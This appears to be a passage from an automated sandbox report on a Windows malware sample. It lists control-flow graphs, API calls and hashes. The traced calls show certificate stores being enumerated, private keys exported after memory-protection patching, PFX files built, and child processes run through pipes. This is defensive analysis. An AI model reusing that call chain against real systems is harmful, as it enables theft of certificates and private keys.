                                                                                            • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 381 4019a9-4019ed call 401240 Sleep 393 4019f3-4019f5 381->393 394 4019ee call 4014c4 381->394 395 401a04-401a24 393->395 396 4019f7-4019ff call 4015b7 393->396 394->393 402 401a32 395->402 403 401a29-401a35 395->403 396->395 402->403 405 401a46 403->405 406 401a3a-401a52 call 401240 403->406 405->406
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                            • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                                            • Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                            • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 410 4019af-4019ed call 401240 Sleep 417 4019f3-4019f5 410->417 418 4019ee call 4014c4 410->418 419 401a04-401a24 417->419 420 4019f7-4019ff call 4015b7 417->420 418->417 426 401a32 419->426 427 401a29-401a35 419->427 420->419 426->427 429 401a46 427->429 430 401a3a-401a52 call 401240 427->430 429->430
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                            • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                                                                            • Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                            • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 434 4019b8-4019ed call 401240 Sleep 438 4019f3-4019f5 434->438 439 4019ee call 4014c4 434->439 440 401a04-401a24 438->440 441 4019f7-4019ff call 4015b7 438->441 439->438 447 401a32 440->447 448 401a29-401a35 440->448 441->440 447->448 450 401a46 448->450 451 401a3a-401a52 call 401240 448->451 450->451
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                            • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                                                                            • Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                            • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 455 76f106-76f140 call 76f419 458 76f142-76f175 VirtualAlloc call 76f193 455->458 459 76f18e 455->459 461 76f17a-76f18c 458->461 459->459 461->459
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0076F157
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.2983174460.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_75d000_dghchav.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction ID: d7e91e5c4eeaf59ac62e6352dbb0939a18377191d603fe608ab9453a9db3d52d
                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction Fuzzy Hash: D6113C79A00208EFDB01DF98CA85E99BFF5AF08350F1580A4F9489B362D775EA50DF80

                                                                                            Execution Graph

                                                                                            Execution Coverage:22.5%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:38.3%
                                                                                            Total number of Nodes:849
                                                                                            Total number of Limit Nodes:32
                                                                                            execution_graph 4497 7ff6dfe2e4e8 lstrcpyW PathAppendW 4498 7ff6dfe2e534 4497->4498 4513 7ff6dfe2cd0c RegGetValueW 4498->4513 4500 7ff6dfe2e602 4501 7ff6dfe2e54f 4501->4500 4502 7ff6dfe21990 4 API calls 4501->4502 4503 7ff6dfe2e56e 4502->4503 4504 7ff6dfe219e4 4 API calls 4503->4504 4505 7ff6dfe2e579 4504->4505 4506 7ff6dfe21990 4 API calls 4505->4506 4507 7ff6dfe2e590 4506->4507 4508 7ff6dfe219e4 4 API calls 4507->4508 4509 7ff6dfe2e59f 4508->4509 4509->4509 4510 7ff6dfe21990 4 API calls 4509->4510 4511 7ff6dfe2e5f6 4510->4511 4512 7ff6dfe225b4 2 API calls 4511->4512 4512->4500 4514 7ff6dfe2cd55 4513->4514 4518 7ff6dfe2cd94 4513->4518 4520 7ff6dfe22588 GetProcessHeap HeapAlloc 4514->4520 4518->4501 4261 7ff6dfe21968 4264 7ff6dfe225dc GetProcessHeap HeapAlloc 4261->4264 4265 7ff6dfe22bac 4266 7ff6dfe22bc5 4265->4266 4267 7ff6dfe21990 4 API calls 4266->4267 4268 7ff6dfe22bdc 4267->4268 4269 7ff6dfe219e4 4 API calls 4268->4269 4270 7ff6dfe22bec 4269->4270 4271 7ff6dfe21990 4 API calls 4270->4271 4272 7ff6dfe22c00 CertOpenStore 4271->4272 4273 7ff6dfe22c48 4272->4273 4274 7ff6dfe22c24 4272->4274 4278 7ff6dfe21990 4 API calls 4273->4278 4275 7ff6dfe21990 4 API calls 4274->4275 4276 7ff6dfe22c38 4275->4276 4280 7ff6dfe22d5c CertEnumCertificatesInStore 4276->4280 4279 7ff6dfe22cbd CertCloseStore 4278->4279 4281 7ff6dfe2319c 4280->4281 4287 7ff6dfe22daa 4280->4287 4282 7ff6dfe231ad 4281->4282 4284 7ff6dfe225b4 2 API calls 4281->4284 4282->4273 4283 7ff6dfe22db0 CertGetNameStringW 4283->4287 4284->4282 4285 7ff6dfe21990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4285->4287 4286 7ff6dfe219e4 4 API calls 4286->4287 4287->4283 4287->4285 4287->4286 4288 7ff6dfe21990 4 API calls 4287->4288 4289 7ff6dfe22e8e CertNameToStrW 4288->4289 4291 7ff6dfe22eca 4289->4291 4290 7ff6dfe21990 4 API calls 4290->4291 4291->4290 4292 7ff6dfe219e4 4 API calls 4291->4292 4293 7ff6dfe21990 4 API calls 4291->4293 4292->4291 4294 7ff6dfe22eec CertNameToStrW 4293->4294 4296 7ff6dfe22f1c 4294->4296 4295 7ff6dfe21990 4 API calls 4295->4296 4296->4295 4297 7ff6dfe219e4 4 API calls 4296->4297 4298 7ff6dfe21990 4 API calls 4296->4298 4297->4296 4299 7ff6dfe22f3e FileTimeToSystemTime 4298->4299 4300 7ff6dfe22f84 4299->4300 4301 7ff6dfe21a70 5 API calls 4300->4301 4302 7ff6dfe22faf FileTimeToSystemTime 4301->4302 4306 7ff6dfe22ffa 4302->4306 4303 7ff6dfe21a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4303->4306 4304 7ff6dfe279f0 2 API calls 4304->4306 4305 7ff6dfe225b4 2 API calls 4305->4306 4306->4303 4306->4304 4306->4305 4308 7ff6dfe21990 4 API calls 4306->4308 4313 7ff6dfe2308d 4306->4313 4309 7ff6dfe2316e CertEnumCertificatesInStore 4308->4309 4309->4281 4309->4283 4311 7ff6dfe225b4 2 API calls 4311->4313 4312 7ff6dfe21990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4312->4313 4313->4306 4313->4311 4313->4312 4314 7ff6dfe225b4 2 API calls 4313->4314 4315 7ff6dfe23220 CertGetCertificateContextProperty 4313->4315 4342 7ff6dfe2a78c 4313->4342 4314->4306 4316 7ff6dfe2348c 4315->4316 4317 7ff6dfe2326c CryptAcquireCertificatePrivateKey 4315->4317 4316->4313 4317->4316 4318 7ff6dfe2329b 4317->4318 4319 7ff6dfe234a9 OpenSCManagerA 4318->4319 4320 7ff6dfe232b4 CryptGetUserKey 4318->4320 4321 7ff6dfe234dd 4319->4321 4320->4316 4322 7ff6dfe232c9 4320->4322 4324 7ff6dfe234fb 6 API calls 4321->4324 4346 7ff6dfe236f0 4322->4346 4325 7ff6dfe235d1 4324->4325 4356 7ff6dfe225dc GetProcessHeap HeapAlloc 4325->4356 4326 7ff6dfe232e5 4326->4316 4328 7ff6dfe23333 LoadLibraryA 4326->4328 4330 7ff6dfe2335f 4328->4330 4332 7ff6dfe2337a GetProcAddress VirtualProtect 4330->4332 4331 7ff6dfe2361d 4334 7ff6dfe23652 CertOpenStore CertAddCertificateLinkToStore CertSetCertificateContextProperty PFXExportCertStoreEx 4331->4334 4333 7ff6dfe233c1 4332->4333 4337 7ff6dfe233d0 VirtualProtect CryptExportKey 4333->4337 4357 7ff6dfe225dc GetProcessHeap HeapAlloc 4334->4357 4337->4316 4338 7ff6dfe2340e VirtualProtect 4337->4338 4354 7ff6dfe2262c 4338->4354 4341 7ff6dfe23463 CryptImportKey 4341->4316 4341->4331 4343 7ff6dfe2a7b4 4342->4343 4359 7ff6dfe225dc GetProcessHeap HeapAlloc 4343->4359 4347 7ff6dfe23728 CryptExportKey 4346->4347 4352 7ff6dfe2370f 4346->4352 4348 7ff6dfe237ac 4347->4348 4349 7ff6dfe2374e 4347->4349 4358 7ff6dfe225dc GetProcessHeap HeapAlloc 4348->4358 4350 7ff6dfe237a8 4349->4350 4353 7ff6dfe23766 CryptExportKey 4349->4353 4350->4326 4352->4347 4353->4348 4353->4350 4355 7ff6dfe22634 VirtualProtect CryptAcquireContextA 4354->4355 4355->4316 4355->4341 4534 7ff6dfe269ec 4535 7ff6dfe26a0f 4534->4535 4535->4535 4536 7ff6dfe27234 5 API calls 4535->4536 4537 7ff6dfe26a7e 4536->4537 4538 7ff6dfe27234 5 API calls 4537->4538 4539 7ff6dfe26aed 4538->4539 4540 7ff6dfe272d4 5 API calls 4539->4540 4541 7ff6dfe26b0c 4540->4541 4542 7ff6dfe25fac 4543 7ff6dfe25fc2 4542->4543 4544 7ff6dfe27234 5 API calls 4543->4544 4545 7ff6dfe25ff0 4544->4545 4561 7ff6dfe26d30 4562 7ff6dfe26d51 4561->4562 4563 7ff6dfe27234 5 API calls 4562->4563 4564 7ff6dfe26dc0 4563->4564 4565 7ff6dfe27234 5 API calls 4564->4565 4566 7ff6dfe26e2d 4565->4566 4567 7ff6dfe272d4 5 API calls 4566->4567 4568 7ff6dfe26e4c 4567->4568 4577 7ff6dfe271ec 4568->4577 4570 7ff6dfe26e6b 4571 7ff6dfe271ec 5 API calls 4570->4571 4572 7ff6dfe26edd 4571->4572 4573 7ff6dfe27234 5 API calls 4572->4573 4574 7ff6dfe26f42 4573->4574 4575 7ff6dfe27234 5 API calls 4574->4575 4576 7ff6dfe26fa0 4575->4576 4578 7ff6dfe27310 5 API calls 4577->4578 4579 7ff6dfe27209 4578->4579 4580 7ff6dfe2722e 4579->4580 4581 7ff6dfe21990 4 API calls 4579->4581 4580->4570 4581->4580 4582 7ff6dfe26270 4583 7ff6dfe26293 4582->4583 4584 7ff6dfe27234 5 API calls 4583->4584 4585 7ff6dfe26302 4584->4585 4586 7ff6dfe27234 5 API calls 4585->4586 4587 7ff6dfe26321 4586->4587 4588 7ff6dfe27234 5 API calls 4587->4588 4589 7ff6dfe26340 4588->4589 4590 7ff6dfe27234 5 API calls 4589->4590 4591 7ff6dfe2635f 4590->4591 4592 7ff6dfe27234 5 API calls 4591->4592 4593 7ff6dfe2637e 4592->4593 4610 7ff6dfe26758 4611 7ff6dfe2677b 4610->4611 4611->4611 4612 7ff6dfe27234 5 API calls 4611->4612 4613 7ff6dfe267ea 4612->4613 4614 7ff6dfe27234 5 API calls 4613->4614 4615 7ff6dfe26859 4614->4615 4616 7ff6dfe27234 5 API calls 4615->4616 4617 7ff6dfe26878 4616->4617 4618 7ff6dfe27234 5 API calls 4617->4618 4619 7ff6dfe26897 4618->4619 4620 7ff6dfe27234 5 API calls 4619->4620 4621 7ff6dfe268b6 4620->4621 4637 7ff6dfe2ec1c 4638 7ff6dfe2ec47 4637->4638 4639 7ff6dfe2ec33 4637->4639 4643 7ff6dfe225dc GetProcessHeap HeapAlloc 4639->4643 4360 7ff6dfe22b1c 4361 7ff6dfe21990 4 API calls 4360->4361 4362 7ff6dfe22b42 4361->4362 4363 7ff6dfe219e4 4 API calls 4362->4363 4364 7ff6dfe22b4d 4363->4364 4365 7ff6dfe21990 4 API calls 4364->4365 4366 7ff6dfe22b5c 4365->4366 4367 7ff6dfe21990 4 API calls 4366->4367 4368 7ff6dfe22b6b CertEnumSystemStore 4367->4368 4369 7ff6dfe21990 4 API calls 4368->4369 4370 7ff6dfe22b94 4369->4370 4644 7ff6dfe2639c 4645 7ff6dfe263c7 4644->4645 4645->4645 4646 7ff6dfe27234 5 API calls 4645->4646 4647 7ff6dfe26449 4646->4647 4648 7ff6dfe27234 5 API calls 4647->4648 4649 7ff6dfe26468 4648->4649 4650 7ff6dfe27234 5 API calls 4649->4650 4651 7ff6dfe26487 4650->4651 4652 7ff6dfe27234 5 API calls 4651->4652 4653 7ff6dfe264ed 4652->4653 4654 7ff6dfe27234 5 API calls 4653->4654 4655 7ff6dfe2650c 4654->4655 4656 7ff6dfe27234 5 API calls 4655->4656 4657 7ff6dfe2652b 4656->4657 4682 7ff6dfe27298 4657->4682 4659 7ff6dfe2654a 4660 7ff6dfe27234 5 API calls 4659->4660 4661 7ff6dfe26569 4660->4661 4662 7ff6dfe27234 5 API calls 4661->4662 4663 7ff6dfe26588 4662->4663 4664 7ff6dfe27234 5 API calls 4663->4664 4665 7ff6dfe265f7 4664->4665 4666 7ff6dfe27234 5 API calls 4665->4666 4667 7ff6dfe26616 4666->4667 4668 7ff6dfe272d4 5 API calls 4667->4668 4669 7ff6dfe26635 4668->4669 4670 7ff6dfe272d4 5 API calls 4669->4670 4671 7ff6dfe26654 4670->4671 4672 7ff6dfe272d4 5 API calls 4671->4672 4673 7ff6dfe266b7 4672->4673 4674 7ff6dfe27234 5 API calls 4673->4674 4675 7ff6dfe266d6 4674->4675 4676 7ff6dfe27234 5 API calls 4675->4676 4677 7ff6dfe266f5 4676->4677 4678 7ff6dfe27234 5 API calls 4677->4678 4679 7ff6dfe26714 4678->4679 4680 7ff6dfe27234 5 API calls 4679->4680 4681 7ff6dfe26733 4680->4681 4683 7ff6dfe27310 5 API calls 4682->4683 4684 7ff6dfe272b5 4683->4684 4685 7ff6dfe272ce 4684->4685 4686 7ff6dfe21a70 5 API calls 4684->4686 4685->4659 4686->4685 4687 7ff6dfe2dc20 4688 7ff6dfe2dc74 4687->4688 4689 7ff6dfe21990 4 API calls 4688->4689 4690 7ff6dfe2dcaa 4689->4690 4691 7ff6dfe21990 4 API calls 4690->4691 4692 7ff6dfe2dcc1 4691->4692 4815 7ff6dfe2cc08 RegOpenKeyExW 4692->4815 4694 7ff6dfe2dce1 4695 7ff6dfe21990 4 API calls 4694->4695 4696 7ff6dfe2dd44 4695->4696 4697 7ff6dfe21990 4 API calls 4696->4697 4698 7ff6dfe2dd5b 4697->4698 4699 7ff6dfe2cd0c 6 API calls 4698->4699 4700 7ff6dfe2dd80 4699->4700 4701 7ff6dfe2dec7 4700->4701 4704 7ff6dfe2dd94 PathCombineW PathFileExistsW 4700->4704 4702 7ff6dfe21990 4 API calls 4701->4702 4703 7ff6dfe2ded6 4702->4703 4710 7ff6dfe21990 4 API calls 4703->4710 4705 7ff6dfe2ddba PathQuoteSpacesW 4704->4705 4706 7ff6dfe2deb4 4704->4706 4821 7ff6dfe2d004 4705->4821 4707 7ff6dfe225b4 2 API calls 4706->4707 4707->4701 4709 7ff6dfe2ddd0 lstrcatW 4823 7ff6dfe2e8b8 4709->4823 4712 7ff6dfe2deed 4710->4712 4714 7ff6dfe2cc08 4 API calls 4712->4714 4716 7ff6dfe2df06 4714->4716 4715 7ff6dfe29644 2 API calls 4718 7ff6dfe2ddfa 4715->4718 4717 7ff6dfe21990 4 API calls 4716->4717 4719 7ff6dfe2df22 4717->4719 4718->4718 4721 7ff6dfe2900c 16 API calls 4718->4721 4720 7ff6dfe21990 4 API calls 4719->4720 4722 7ff6dfe2df31 4720->4722 4723 7ff6dfe2de4f 4721->4723 4725 7ff6dfe21990 4 API calls 4722->4725 4724 7ff6dfe295a0 8 API calls 4723->4724 4728 7ff6dfe2de95 4723->4728 4727 7ff6dfe2de64 4724->4727 4726 7ff6dfe2df48 4725->4726 4730 7ff6dfe2df54 GetEnvironmentVariableW 4726->4730 4729 7ff6dfe2de8b 4727->4729 4732 7ff6dfe297dc 16 API calls 4727->4732 4736 7ff6dfe225b4 2 API calls 4728->4736 4731 7ff6dfe29478 13 API calls 4729->4731 4734 7ff6dfe2df7d 4730->4734 4735 7ff6dfe2e1fb 4730->4735 4731->4728 4733 7ff6dfe2de78 4732->4733 4733->4729 4738 7ff6dfe21990 4 API calls 4733->4738 4739 7ff6dfe2df89 PathAppendW PathFileExistsW 4734->4739 4737 7ff6dfe21990 4 API calls 4735->4737 4736->4706 4740 7ff6dfe2e20a 4737->4740 4738->4729 4739->4735 4741 7ff6dfe2dfae CreateFileW 4739->4741 4744 7ff6dfe21990 4 API calls 4740->4744 4741->4735 4742 7ff6dfe2dfe3 GetFileSize 4741->4742 4830 7ff6dfe225dc GetProcessHeap HeapAlloc 4742->4830 4745 7ff6dfe2e221 4744->4745 4747 7ff6dfe2cc08 4 API calls 4745->4747 4750 7ff6dfe2e23e 4747->4750 4753 7ff6dfe21990 4 API calls 4750->4753 4755 7ff6dfe2e25a 4753->4755 4758 7ff6dfe21990 4 API calls 4755->4758 4762 7ff6dfe2e271 4758->4762 4764 7ff6dfe2e27d GetEnvironmentVariableW 4762->4764 4766 7ff6dfe2e390 4764->4766 4767 7ff6dfe2e2a0 4764->4767 4768 7ff6dfe21990 4 API calls 4766->4768 4772 7ff6dfe2e2ac PathAppendW PathFileExistsW 4767->4772 4769 7ff6dfe2e39f 4768->4769 4774 7ff6dfe21990 4 API calls 4769->4774 4772->4766 4773 7ff6dfe2e2d1 CreateFileW 4772->4773 4773->4766 4777 7ff6dfe2e306 GetFileSize 4773->4777 4778 7ff6dfe2e3ae 4774->4778 4831 7ff6dfe22588 GetProcessHeap HeapAlloc 4777->4831 4816 7ff6dfe2cceb 4815->4816 4817 7ff6dfe2cc5b RegEnumKeyExW 4815->4817 4816->4694 4818 7ff6dfe2cce0 RegCloseKey 4817->4818 4819 7ff6dfe2cc91 RegEnumKeyExW 4817->4819 4818->4816 4819->4818 4822 7ff6dfe2d05f 4821->4822 4822->4709 4824 7ff6dfe2e7e0 2 API calls 4823->4824 4825 7ff6dfe2e8d7 4824->4825 4832 7ff6dfe2e764 4825->4832 4828 7ff6dfe2e6f0 4 API calls 4829 7ff6dfe2dded 4828->4829 4829->4715 4833 7ff6dfe2e7ab 4832->4833 4835 7ff6dfe2e77f 4832->4835 4833->4828 4834 7ff6dfe2e6f0 4 API calls 4834->4835 4835->4833 4835->4834 3953 7ff6dfe29ac8 3954 7ff6dfe29af7 3953->3954 4090 7ff6dfe21990 3954->4090 3956 7ff6dfe29b02 4094 7ff6dfe29644 3956->4094 3958 7ff6dfe29b0b 3958->3958 4099 7ff6dfe2900c 3958->4099 3961 7ff6dfe2a4fb 3963 7ff6dfe21990 4 API calls 3961->3963 3964 7ff6dfe2a513 3963->3964 3965 7ff6dfe29b7c 3965->3961 4134 7ff6dfe297dc 3965->4134 3968 7ff6dfe21990 4 API calls 3969 7ff6dfe29bb6 3968->3969 3970 7ff6dfe297dc 16 API calls 3969->3970 3971 7ff6dfe29bce 3970->3971 3971->3961 3972 7ff6dfe21990 4 API calls 3971->3972 3973 7ff6dfe29be1 3972->3973 3974 7ff6dfe297dc 16 API calls 3973->3974 3975 7ff6dfe29bf9 3974->3975 3975->3961 3976 7ff6dfe21990 4 API calls 3975->3976 3977 7ff6dfe29c0c 3976->3977 3978 7ff6dfe297dc 16 API calls 3977->3978 3979 7ff6dfe29c24 3978->3979 3979->3961 3980 7ff6dfe21990 4 API calls 3979->3980 3981 7ff6dfe29c37 3980->3981 3982 7ff6dfe297dc 16 API calls 3981->3982 3983 7ff6dfe29c4f 3982->3983 3983->3961 3984 7ff6dfe21990 4 API calls 3983->3984 3985 7ff6dfe29c62 3984->3985 3986 7ff6dfe297dc 16 API calls 3985->3986 3987 7ff6dfe29c7a 3986->3987 3987->3961 3988 7ff6dfe21990 4 API calls 3987->3988 3989 7ff6dfe29c8d 3988->3989 3990 7ff6dfe297dc 16 API calls 3989->3990 3991 7ff6dfe29ca5 3990->3991 3991->3961 3992 7ff6dfe21990 4 API calls 3991->3992 3993 7ff6dfe29cb8 3992->3993 3994 7ff6dfe297dc 16 API calls 3993->3994 3995 7ff6dfe29cd0 3994->3995 3995->3961 3996 7ff6dfe21990 4 API calls 3995->3996 3997 7ff6dfe29ce3 3996->3997 3998 7ff6dfe297dc 16 API calls 3997->3998 3999 7ff6dfe29cfb 3998->3999 3999->3961 4000 7ff6dfe21990 4 API calls 3999->4000 4001 7ff6dfe29d0e 4000->4001 4002 7ff6dfe297dc 16 API calls 4001->4002 4003 7ff6dfe29d26 4002->4003 4003->3961 4004 7ff6dfe21990 4 API calls 4003->4004 4005 7ff6dfe29d39 4004->4005 4006 7ff6dfe297dc 16 API calls 4005->4006 4007 7ff6dfe29d51 4006->4007 4007->3961 4008 7ff6dfe21990 4 API calls 4007->4008 4009 7ff6dfe29d64 4008->4009 4010 7ff6dfe297dc 16 API calls 4009->4010 4011 7ff6dfe29d7c 4010->4011 4011->3961 4012 7ff6dfe21990 4 API calls 4011->4012 4013 7ff6dfe29d8f 4012->4013 4014 7ff6dfe297dc 16 API calls 4013->4014 4015 7ff6dfe29da7 4014->4015 4015->3961 4016 7ff6dfe21990 4 API calls 4015->4016 4017 7ff6dfe29dba 4016->4017 4018 7ff6dfe297dc 16 API calls 4017->4018 4019 7ff6dfe29dd2 4018->4019 4019->3961 4020 7ff6dfe21990 4 API calls 4019->4020 4021 7ff6dfe29de5 4020->4021 4021->4021 4022 7ff6dfe297dc 16 API calls 4021->4022 4023 7ff6dfe29e45 4022->4023 4023->3961 4024 7ff6dfe21990 4 API calls 4023->4024 4025 7ff6dfe29e58 4024->4025 4025->4025 4026 7ff6dfe297dc 16 API calls 4025->4026 4027 7ff6dfe29eb4 4026->4027 4027->3961 4028 7ff6dfe21990 4 API calls 4027->4028 4029 7ff6dfe29ec7 4028->4029 4029->4029 4030 7ff6dfe297dc 16 API calls 4029->4030 4031 7ff6dfe29f2d 4030->4031 4031->3961 4032 7ff6dfe21990 4 API calls 4031->4032 4033 7ff6dfe29f40 4032->4033 4033->4033 4034 7ff6dfe297dc 16 API calls 4033->4034 4035 7ff6dfe29f97 4034->4035 4035->3961 4036 7ff6dfe21990 4 API calls 4035->4036 4037 7ff6dfe29fb1 4036->4037 4037->4037 4038 7ff6dfe297dc 16 API calls 4037->4038 4039 7ff6dfe2a006 4038->4039 4039->3961 4040 7ff6dfe21990 4 API calls 4039->4040 4041 7ff6dfe2a019 4040->4041 4041->4041 4042 7ff6dfe297dc 16 API calls 4041->4042 4043 7ff6dfe2a079 4042->4043 4043->3961 4044 7ff6dfe21990 4 API calls 4043->4044 4045 7ff6dfe2a08c 4044->4045 4045->4045 4046 7ff6dfe297dc 16 API calls 4045->4046 4047 7ff6dfe2a0e2 4046->4047 4047->3961 4048 7ff6dfe21990 4 API calls 4047->4048 4049 7ff6dfe2a0f9 4048->4049 4049->4049 4050 7ff6dfe297dc 16 API calls 4049->4050 4051 7ff6dfe2a157 4050->4051 4051->3961 4052 7ff6dfe21990 4 API calls 4051->4052 4053 7ff6dfe2a16e 4052->4053 4053->4053 4054 7ff6dfe297dc 16 API calls 4053->4054 4055 7ff6dfe2a1c8 4054->4055 4055->3961 4056 7ff6dfe21990 4 API calls 4055->4056 4057 7ff6dfe2a1df 4056->4057 4057->4057 4058 7ff6dfe297dc 16 API calls 4057->4058 4059 7ff6dfe2a227 4058->4059 4059->3961 4060 7ff6dfe21990 4 API calls 4059->4060 4061 7ff6dfe2a23e 4060->4061 4061->4061 4062 7ff6dfe297dc 16 API calls 4061->4062 4063 7ff6dfe2a290 4062->4063 4063->3961 4064 7ff6dfe21990 4 API calls 4063->4064 4065 7ff6dfe2a2a7 4064->4065 4065->4065 4066 7ff6dfe297dc 16 API calls 4065->4066 4067 7ff6dfe2a2ee 4066->4067 4067->3961 4068 7ff6dfe21990 4 API calls 4067->4068 4069 7ff6dfe2a305 4068->4069 4069->4069 4070 7ff6dfe297dc 16 API calls 4069->4070 4071 7ff6dfe2a359 4070->4071 4071->3961 4072 7ff6dfe21990 4 API calls 4071->4072 4073 7ff6dfe2a370 4072->4073 4073->4073 4074 7ff6dfe297dc 16 API calls 4073->4074 4075 7ff6dfe2a3bc 4074->4075 4075->3961 4076 7ff6dfe21990 4 API calls 4075->4076 4077 7ff6dfe2a3d6 4076->4077 4077->4077 4078 7ff6dfe297dc 16 API calls 4077->4078 4079 7ff6dfe2a437 4078->4079 4079->3961 4080 7ff6dfe21990 4 API calls 4079->4080 4081 7ff6dfe2a44a 4080->4081 4081->4081 4082 7ff6dfe297dc 16 API calls 4081->4082 4083 7ff6dfe2a499 4082->4083 4083->3961 4084 7ff6dfe21990 4 API calls 4083->4084 4085 7ff6dfe2a4a8 4084->4085 4085->4085 4086 7ff6dfe297dc 16 API calls 4085->4086 4087 7ff6dfe2a4ee 4086->4087 4087->3961 4088 7ff6dfe2a4f2 4087->4088 4183 7ff6dfe29478 4088->4183 4091 7ff6dfe219ad 4090->4091 4199 7ff6dfe21918 4091->4199 4093 7ff6dfe219ba 4093->3956 4209 7ff6dfe2e7e0 4094->4209 4097 7ff6dfe2e7e0 2 API calls 4098 7ff6dfe29672 4097->4098 4098->3958 4213 7ff6dfe22554 4099->4213 4102 7ff6dfe29069 4107 7ff6dfe21990 4 API calls 4102->4107 4103 7ff6dfe290a3 CreatePipe 4104 7ff6dfe290e8 CreatePipe 4103->4104 4105 7ff6dfe290c1 4103->4105 4106 7ff6dfe29106 4104->4106 4111 7ff6dfe29130 4104->4111 4109 7ff6dfe21990 4 API calls 4105->4109 4110 7ff6dfe21990 4 API calls 4106->4110 4108 7ff6dfe2907d GetLastError 4107->4108 4114 7ff6dfe2908e 4108->4114 4112 7ff6dfe290d5 GetLastError 4109->4112 4113 7ff6dfe2911a GetLastError 4110->4113 4215 7ff6dfe27cfc 4111->4215 4112->4114 4113->4114 4222 7ff6dfe21a70 4114->4222 4117 7ff6dfe2909c 4117->3961 4126 7ff6dfe295a0 WaitForSingleObject 4117->4126 4118 7ff6dfe2917b CreateProcessW 4219 7ff6dfe225b4 4118->4219 4120 7ff6dfe291c7 4121 7ff6dfe291cb 4120->4121 4122 7ff6dfe291f5 CloseHandle 4120->4122 4123 7ff6dfe21990 4 API calls 4121->4123 4122->4117 4124 7ff6dfe291df GetLastError 4123->4124 4125 7ff6dfe291f0 4124->4125 4125->4122 4127 7ff6dfe295c3 4126->4127 4132 7ff6dfe29600 4126->4132 4130 7ff6dfe295d4 4127->4130 4226 7ff6dfe2968c PeekNamedPipe 4127->4226 4129 7ff6dfe295ee GetExitCodeProcess 4129->4132 4130->4129 4131 7ff6dfe2968c 6 API calls 4130->4131 4130->4132 4133 7ff6dfe295ea 4131->4133 4132->3965 4133->4129 4133->4132 4135 7ff6dfe21990 4 API calls 4134->4135 4136 7ff6dfe29813 4135->4136 4136->4136 4137 7ff6dfe21990 4 API calls 4136->4137 4138 7ff6dfe29877 4137->4138 4240 7ff6dfe279f0 4138->4240 4142 7ff6dfe2988d 4143 7ff6dfe225b4 GetProcessHeap RtlFreeHeap 4142->4143 4144 